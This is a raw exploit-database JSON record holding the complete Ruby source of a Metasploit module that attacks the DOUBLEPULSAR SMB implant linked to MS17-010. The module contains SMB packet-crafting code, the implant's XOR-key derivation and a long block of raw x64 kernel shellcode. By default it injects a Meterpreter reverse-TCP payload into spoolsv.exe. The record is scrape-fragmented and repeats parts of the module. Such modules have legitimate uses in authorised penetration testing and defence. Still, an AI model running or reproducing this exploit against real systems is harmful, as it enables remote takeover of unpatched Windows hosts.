Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-14] #"}, "lastseen": "2021-10-14T08:21:09", "differentElements": ["sourceData"], "edition": 44}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "4f951f3d4f30f6a5406165c9984da9ef", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-14T22:26:47", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27802"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-14T22:26:47", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-14T22:26:47", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n 